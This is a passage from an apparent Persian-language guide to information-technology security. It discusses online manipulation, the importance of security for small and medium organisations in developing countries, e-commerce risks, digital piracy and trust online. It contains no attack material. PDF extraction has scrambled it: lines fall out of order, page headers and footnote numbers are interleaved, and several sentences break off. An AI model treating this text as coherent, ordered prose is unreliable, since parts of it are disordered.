ﺩﺳﺘﻜﺎﺭﻱ ﺩﺭ ﺷﺒﻜﺔ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺭﺳﻴﺪﻥ ﺑـﻪ ﻧﺘـﺎﻳﺞ ﻣﻄﻠـﻮﺏ
ﺁﻧﻬﺎ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﻋﻠﻴـﻪ ﺩﻳﮕـﺮﺍﻥ ﻧﻴـﺰ
ﺑﺸﻮﺩ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻋﻼﻗـﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﻛـﻪ
ﻧﺘﻴﺠﺔ ﻳﻚ ﻧﻈﺮﺳﻨﺠﻲ ﻳﺎ ﺣﺘﻲ ﺍﻧﺘﺨﺎﺑﺎﺕ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻛﻨﻨـﺪ ﺗـﺎ
ﺑﻪ ﻧﺘﺎﻳﺞ ﻣﻄﻠﻮﺏ ﺧﻮﺩ ﺑﺮﺳﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﻣﺆﺳﺴﺎﺕ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ
ﺭﻭﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺯﻳﺎﺩﻱ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺑﺘﻮﺍﻧﻨﺪ ﺗﺎ ﻣﺪﺗﻬﺎ ﺁﻧﺮﺍ ﻫﻤﭽﻨﺎﻥ ﺑﺎ ﻗﻮﺕ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ.
ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﻣﻨﺎﻓﻊ ﺑﺎﻟﻘﻮﺓ ﻣﻮﺟﻮﺩ ﺩﺭ ﻋـﺼﺮ ﻧـﻮﻳﻦ ﺩﻳﺠﻴﺘـﺎﻝ
ﺑﻴﺸﻤﺎﺭ ﻫﺴﺘﻨﺪ .ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳـﺖ ﻛـﻪ ﺑـﺎ ﺍﻳﻤـﻦﺳـﺎﺯﻱ
ﻣﺤﻴﻂ ﻓﻴﺰﻳﻜﻲ ،ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ،ﺭﺍﻳﺎﻧﻪ ﻫﺎ ،ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﻣﻨـﺎﺑﻊ
ﻲ ﺧﻮﺩ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﻓﻊ ﺣﻔﺎﻇﺖ ﻛﻨﻴﻢ .ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺩﺭ ﺍﻧﺠﺎﻡ
ﺍﻃﻼﻋﺎﺗ ﹺ
ﺍﻳﻦ ﻣﻬﻢ ﺭﺳﻴﺪﻥ ﺑﻪ ﺳﻄﺢ ﺷﻨﺎﺧﺖ ﻛﺎﻓﻲ ﻭ ﺻﺤﻴﺢ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ
ﻲ
ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺗﺨﺎﺫ ﺗﺼﻤﻴﻤﺎﺕ ﻋﺎﻗﻼﻧﻪ ﺩﺭﺑﺎﺭﺓ ﭼﮕﻮﻧﮕ ﹺ
ﺭﺳﻴﺪﻥ ﺑﻪ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﺎ ﻛﻤﻚ ﻛﻨﺪ .ﺑـﺴﻴﺎﺭﻱ
ﺍﺯ ﻣﺎ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﭼﻨﺪﻳﻦ ﻧﻘـﺶ ﺭﺍ ﺑـﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﻳـﻢ :ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ ﺍﺯ ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﻴﻢ ،ﺩﺭ
ﻗﺒﺎﻝ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻭ ﺧﺪﻣﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ
ﻣﺴﺌﻮﻟﻴﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﻢ ،ﻭ ﻳﺎ ﺑﻪ ﻫﻤﻜﺎﺭﻱ ﺑـﺎ ﺩﻭﻟـﺖ ﺩﺭ ﺍﺟـﺮﺍﻱ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﻤﺎﻳﺘﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﻋﻼﻗﻪﻣﻨﺪ ﺑﺎﺷﻴﻢ.
ﻫﻤﺔ ﻣﺎ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻧﻘﺸﻬﺎ ﺩﺭ ﻗﺒﺎﻝ ﺗﺤﻘﻖ ﺳﻄﺢ ﻣﻄﻠﻮﺑﻲ
ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﺴﺌﻮﻝ ﻫـﺴﺘﻴﻢ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ
ﻻ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺍﻣﻨﻴـﺖ ﺿـﻌﻴﻔﺘﺮﻳﻦ ﺟـﺰ ِﺀ ﺁﻥ ﻣﺤـﻴﻂ
ﭘﻴﭽﻴﺪﻩ ﻣﻌﻤﻮ ﹰ
ﺍﺳﺘﺤﻜﺎﻡ ﺩﺍﺭﺩ؛ ﺍﺯ ﺍﻳﻨﺮﻭ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﻛﻪ ﺍﺟﺰﺍﻱ ﻣﺤﻴﻄـﻲ
ﻦ
ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻛﻨﺘﺮﻝ ﺩﺍﺭﻳﻢ ﺁﻧﻘﺪﺭ ﻗﻮﻱ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺿـﻌﻴﻔﺘﺮﻳ ﹺ
٤١
ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺍﻫﻤﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ
ﻣﺘﻮﺳﻂ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ
ﺑﺎ ﺍﻳﻨﻜﻪ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﻫﻤـﻪ ﺣـﺎﺋﺰ ﺍﻫﻤﻴـﺖ ﺍﺳـﺖ ،ﺍﻣـﺎ ﺑـﺮﺍﻱ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳﻂ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻫﻤﻴﺖ
ﻭﻳﮋﻩ ﺍﻱ ﺩﺍﺭﺩ .ﻧﺘﺎﻳﺞ ﺣﺎﺻﻞ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺑﺎﺯﺍﺭ ﺟﻬـﺎﻧﻲ ﺑـﺎ ﻛﻤـﻚ
ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃــﺎﺕ ﺑــﺴﻴﺎﺭ ﻣﻄﻠــﻮﺏ ﺍﺳــﺖ ،ﻭﻟــﻲ
ﻣﺨﺎﻃﺮﺍﺕ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺼﻮﺭﺕ ﻧﺎﺍﻣﻦ ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺍﺳﺎﺳﻲ ﺍﺳﺖ.
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺻﻨﺎﻑ ﺗﺠﺎﺭﻱ ،ﻋﻤﻠﻴﺎﺕ ﺩﺳﺘﻲ ﺑـﻪ ﻣـﺪﻳﺮﻳﺖ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺘـﻪ ﺍﺳـﺖ .ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣـﺴﺘﻘﻞ
ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻋﺮﺻــﻪﻫــﺎﻱ ﺍﻗﺘــﺼﺎﺩﻱ ﻛــﺸﻮﺭﻫﺎﻱ
ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺑﺮﺍﻱ ﻣﺪﺕﺯﻣﺎﻧﻲ ﻣﺸﺨﺺ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺑﺎ ﻣﻌﺮﻓـﻲ
ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺪﻳﺪ ،ﻣﺪﻳﺮﺍﻥ ﺑﻪ ﺳﻤﺖ ﻭ ﺳﻮﻱ ﻛﺴﺐ ﺩﺍﻧﺶ ﻭ
ﺍﻃﻼﻋﺎﺕ ﺩﺭﺑﺎﺭﺓ ﻣﻮﺿﻮﻋﺎﺕ ﻛﺎﺭﺑﺮﺩﻱ ﭼﻮﻥ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ،٦٣
٦٤
ﻧﮕﻬﺪﺍﺭﻱ ﺷﺒﻜﻪ ،ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻣﻤﻴـﺰﻱ )ﺑـﺎﺯﺑﻴﻨﻲ(
ﻲ ﻣـﻮﺍﺭﺩ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺣﺮﻛﺖ ﻫﺴﺘﻨﺪ .ﻛﺴﺐ ﻣﻮﻓﻘﻴـﺖ ﺩﺭ ﻫﻤﮕـ ﹺ
ﻓــﻮﻕ ﻣــﺴﺘﻠﺰﻡ ﺁﺷــﻨﺎﻳﻲ ﺑــﺎ ﺭﺍﻳﺎﻧــﻪ ،ﺷــﺒﻜﻪ ،ﻭ ﻣﻔــﺎﻫﻴﻢ ﺍﻣﻨﻴــﺖ
ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ.
ﺑﺎ ﻣﻌﺮﻓﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻭ ﺍﻣﻜﺎﻥ ﻭﺭﻭﺩ ﺑﻪ ﻋﺮﺻـﺔ ﺗﺠـﺎﺭﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺳﻴﺴﺘﻢ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﺑﺎﻳـﺪ ﺍﺯ
ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﻣﺘﻔﺎﻭﺕ ﻧﻈﺎﺭﻩ ﺷـﻮﻧﺪ .ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣـﺴﺘﻘﻞ ﻋﻤﻮﻣـﹰﺎ
ﻣﺤﺼﻮﻝﻣﺤﻮﺭ ﻳﺎ ﻓﺮﺁﻳﻨﺪﻣﺤﻮﺭ ﻫﺴﺘﻨﺪ )ﻣﺜﻞ ﺍﻧﺒﺎﺭﺩﺍﺭﻱ ،ﺳﻔﺎﺭﺷﺎﺕ ﻳـﺎ
ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﻧﻈﻴﺮ ﺗﻮﻟﻴﺪ ،ﺛﺒﺖ ﺩﺭ ﺩﻓﺎﺗﺮ ﻋﻤـﻮﻣﻲ ،ﻭ ﺣـﺴﺎﺑﻬﺎﻱ ﭘﺮﺩﺍﺧﺘﻨـﻲ ﻭ
ﺩﺭﻳـﺎﻓﺘﻨﻲ( ،ﺍﻣﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻮﻓﻖ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺮﺧﻂ ﺑـﻪ
ﺭﻭﺵ ﺩﻳﮕﺮﻱ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﻲ ﺷﻮﻧﺪ .ﺩﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﺮﺍﻱ
ﻛﺴﺐ ﻣﻮﻓﻘﻴﺖ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻃﺮﺍﺣـﻲ ﻣـﺸﺘﺮﻱﻣـﺪﺍﺭ ﺑﺎﺷـﺪ ﻭ
ﺳﻴﺴﺘﻢ ﺑﻪ ﺗﻌﻘﻴـﺐ ﺭﻓﺘـﺎﺭ ﻣـﺸﺘﺮﻱ ﺩﺭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺟـﺴﺘﺠﻮ ﻭ
ﺍﺭﺯﻳﺎﺑﻲ ﻣﺤﺼﻮﻻﺕ ،ﺍﺭﺍﺋﻪ ﺳﻔﺎﺭﺵ ،ﺗﻜﻤﻴﻞ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣـﺎﻟﻲ ﻭ
ﺭﺩﮔﻴﺮﻱ ﻣﺤﺼﻮﻝ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺑﭙﺮﺩﺍﺯﺩ .ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻧﮕﺮﺍﻧﻲ
ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﺼﻮﻻﺕ ﻭ ﻓﺮﺁﻳﻨﺪﻫﺎ ﻫﻤﭽﻨﺎﻥ ﻣﻬـﻢ ﺍﺳـﺖ ،ﺍﻣـﺎ ﺩﺭ
ﻞ ﻧﻴﺎﺯ ﺑﻪ ﺗﻌﻘﻴﺐ ﺭﻓﺘﺎﺭ ﻣﺸﺘﺮﻱ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﺍﻧﺠـﺎﻡ ﻫـﺮ
ﻣﻘﺎﺑ ﹺ
ﻣﻌﺎﻣﻠﻪﺍﻱ ﻛﻪ ﻣﺸﺘﺮﻱ ﺁﻧﺮﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨﺪ ﺩﺭ ﺍﻭﻟﻮﻳﺖ ﺑﻌـﺪﻱ
ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ .ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﻣﺠﺪﺩ ﺑﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ ﻣﻮﻓﻘﻴـﺖ
Backup
Audit
63
64
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ ﺑﺎﻳـﺪ ﺁﮔـﺎﻩ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺍﺻـﻼﺡ
ﻧﮕــﺮﺵ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺗﺠــﺎﺭﻱ ﺑــﺮﺍﻱ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺍﻳﻨﺘﺮﻧــﺖ،
ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪﻱ ﺑـﺮﺍﻱ ﺁﻧﻬـﺎ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﺩﺍﺭﺩ .ﻳﻜـﻲ ﺍﺯ ﺍﻳـﻦ
ﺧﻄﺮﺍﺕ ﺍﺯ ﻫﻤﻪ ﺟﺪﻳﺪﺗﺮ ﺍﺳﺖ :ﺍﺣﺘﻤﺎﻝ ﺑـﻪ ﺳـﺮﻗﺖ ﺭﻓـﺘﻦ ﻭ ﺩﺭ
ﻣﻌﺮﺽ ﻓﺮﻭﺵ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺷـﺮﻛﺖ .ﺩﺭ
ﻋﺼﺮﻱ ﻛـﻪ ﻛﺎﻻﻫـﺎ ﻭ ﺧـﺪﻣﺎﺕ ﻓﺮﻭﺧﺘـﻪﺷـﺪﻩ ﺭﺍ ﻣﺤـﺼﻮﻻﺕ
ﺍﻃﻼﻋﺎﺗﻲ ﺗﺸﻜﻴﻞ ﻣﻲﺩﻫﻨﺪ ،ﺍﺣﺘﻤﺎﻝ ﺗﻮﺯﻳﻊ ﻭ ﺗﻬﻴـﺔ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ
ﺁﻧﻬﺎ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻭ ﻳـﺎ ﺩﺭ ﺑـﺎﺯﺍﺭ ﺳـﻴﺎﻩ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ
ﺍﻳﻨﺤﺎﻟﺖ ﻣﻨﺎﻓﻊ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺳﺎﺭﻗﺎﻥ ﻣﻲﺭﺳﺪ ،ﻭ ﻧﻪ ﺑﻪ ﺷﺮﻛﺘﻲ ﻛـﻪ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺑﺎﺭﺯﺗﺮﻳﻦ ﻧﻤﻮﻧﺔ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻛﻪ ﺍﻣـﺮﻭﺯﻩ ﻣـﻲﺗـﻮﺍﻥ
ﻣﺸﺎﻫﺪﻩ ﻛـﺮﺩ ﺩﺭ ﺻـﻨﻌﺖ ﻣﻮﺳـﻴﻘﻲ ﺭﻭﺍﺝ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﻪ ﺗﻮﺯﻳـﻊ
ﻣﺤﺼﻮﻻﺕ ﻣﺴﺮﻭﻗﻪ ﻭ ﻏﺎﻟﺒﹰﺎ ﻫﻢ ﺩﺭ ﻗﺎﻟﺐ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﻣﻨﺠـﺮ
ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳـﺮﻣﺎﻳﻪ ﻫـﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ
ﻣﺴﺌﻠﻪﺍﻱ ﺣﻞﻧﺸﺪﻩ ﻣﻲﺑﺎﺷﺪ ،ﻫﺮﭼﻨـﺪ ﺑـﺮﺍﻱ ﺣـﻞ ﺁﻥ ﺍﻗـﺪﺍﻣﺎﺕ
ﺯﻳﺎﺩﻱ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﺩﻳﺮﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻣﺤـﺼﻮﻻﺕ
ﺍﻃﻼﻋﺎﺗﻲ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻧـﺴﺨﻪﺑﺮﺩﺍﺭﻳﻬـﺎﻱ ﻧـﺴﺒﺘﹰﺎ ﻛـﺎﻣﻠﻲ ﺍﻧﺠـﺎﻡ
ﻣﻲﺷﻮﺩ ،ﭼﺮﺍﻛﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺁﺳﺎﻥ ﺑﻮﺩﻩ ﻭ ﺣﻴﻦ ﻓﺮﻭﺵ
ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻪ ﺩﻧﺒﺎﻝ ﻧﺴﺨﻪ ﺍﺻﻠﻲ ﺁﻥ ﺑﻮﺩ .ﻓﻨـﺎﻭﺭﻱ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺻﻨﻌﺖ ﻣﻮﺳﻴﻘﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺷﺮﺍﻳﻂ ﻭ ﻣﺤﻴﻄﻬﺎﻱ
ﺩﻳﮕﺮ ﻧﻴﺰ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺩ ،ﺑـﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ ﻛـﻪ ﻓـﻮﺕ ﻭ
ﻓﻨﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻳﺎ ﺩﻳﮕﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ
ﺭﻭﺷﻬﺎﻳﻲ ﺗﻬﻴﻪ ﻭ ﻣﻨﺘﺸﺮ ﻧﻤﻮﺩ ﻛـﻪ ﻣﻮﺟـﺐ ﺗﺨﺮﻳـﺐ ﺷـﺪﻳﺪ ﺁﻥ
ﺗﺠﺎﺭﺕ ﻭ ﺻﻨﻌﺖ ﮔﺮﺩﺩ .ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﺑﺎ ﺍﺭﺯﺵ ﻧﻴﺎﺯ ﺑـﻪ ﺣﻔﺎﻇـﺖ
ﻛﺎﻓﻲ ﻭ ﻣﻨﺎﺳﺐ ﺩﺍﺭﻧﺪ .ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﺳﻄﺢ ﺍﺯ ﺍﻣﻨﻴﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﻗﺮﺍﺭ
ﺷﻮﺩ ،ﺍﻣﺎ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛﺎﺭ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻲ ﻛﻪ ﺩﺭ ﻗﺎﻟـﺐ
ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﺑﺎ ﻣﺨﺎﻃﺮﺍﺕ ﻭ ﺭﻭﺷﻬﺎﻱ ﻛﺎﺭ ﺩﺭ
ﺷﺮﻛﺘﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺳﻨﺘﻲ ﺑﻪ ﺗﺠﺎﺭﺕ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ.
ﺑﺴﻮﻱ ﻣﻔﻬﻮﻡ ﻧﻮﻳﻨﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ
ﻣﺤﻴﻂ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺟﺪﻳﺪ ﺍﺯ ﻣﺎ ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﺩﺭ ﺗﻌﺮﻳـﻒ ﺧـﻮﺩ ﺍﺯ
ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺑﺎﺯﻧﮕﺮﻱ ﻛﻨﻴﻢ .ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻴﺰﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺑـﻪ ﻳـﻚ
ﺑﺨﺶ ﺍﻭﻝ
ﺁﻧﻬﺎ ﻫﻢ ﺍﺯ ﺗﻮﺍﻧﺎﻳﻲ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﻮﺟـﻮﺩ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﺍﺳﺖ.
ﺿﺮﻭﺭﻱ ﺍﺳﺖ ،ﺍﻣﺎ ﺑﻪ ﻳﻚ ﺭﺍﻫﻜـﺎﺭ ﺟـﺎﻳﮕﺰﻳﻦ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﻳﺖ
ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺧﺮﻳﺪ ﻣﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﺩ؛ ﺭﻭﺷـﻲ ﻛـﻪ ﺍﮔـﺮ ﺑـﺪﻭﻥ
ﺗﻮﺟﻪ ﻛﺎﻓﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻩ ﺭﺍ ﺑﺮﺍﻱ ﺭﻭﺷﻬﺎﻱ
ﺟﺪﻳﺪ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺯ ﺑﮕﺬﺍﺭﺩ.
٤٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻼ ﺍﺯ
ﺷﺨﺺ ،ﻳﻚ ﻓﺮﺁﻳﻨﺪ ،ﻳﺎ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ؛ ﻣـﺜ ﹰ
ﺗﻄﺎﺑﻖ ﻣﺸﺎﻫﺪﺍﺕ ﻓﻌﻠﻲ ﺑﺎ ﺗﺠﺮﺑﻴﺎﺕ ﻭ ﺩﺍﻧـﺴﺘﻪﻫـﺎﻱ ﻗﺒﻠـﻲﻣـﺎﻥ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﻴﻢ .ﺣـﻴﻦ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ
ﺑﻴﺸﺘ ﹺﺮ ﺷﺎﺧﺼﻬﺎﻱ ﻏﻴﺮ ﺷﻔﺎﻫﻲ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺍﺯ ﺩﺳـﺖ ﻣـﻲﺭﻭﻧـﺪ.
ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨـﻴﻢ ﻳـﺎ ﺻـﻔﺤﺔ
ﻭﺑﻲ ﺭﺍ ﻣﻲﺧﻮﺍﻧﻴﻢ ،ﻧﻤﻲﺗﻮﺍﻧﻴﻢ ﻫﻤﻴﺸﻪ ﺑﮕﻮﺋﻴﻢ ﻛﻪ ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ
ﺩﻗﻴﻖ ﺑﻮﺩ ﻭ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﺮﺩﻳﻢ ﻣﺸﺨﺺ ﻣﻲﺷﺪ ﻛـﻪ
ﺻﺤﻴﺢ ﻧﻴﺴﺘﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲ ﺩﺍﻧﻴﻢ ﻛـﻪ ﺧﻄﺎﻫـﺎﻱ ﻭﺍﻗـﻊﺷـﺪﻩ
ﻧﺘﻴﺠﻪ ﺳﻬﻞﺍﻧﮕﺎﺭﻱ ﻫﺴﺘﻨﺪ ﻳﺎ ﺗﻼﺷﻬﺎﻳﻲ ﺗﻌﻤﺪﻱ ﺑـﺮﺍﻱ ﻓﺮﻳـﺐ
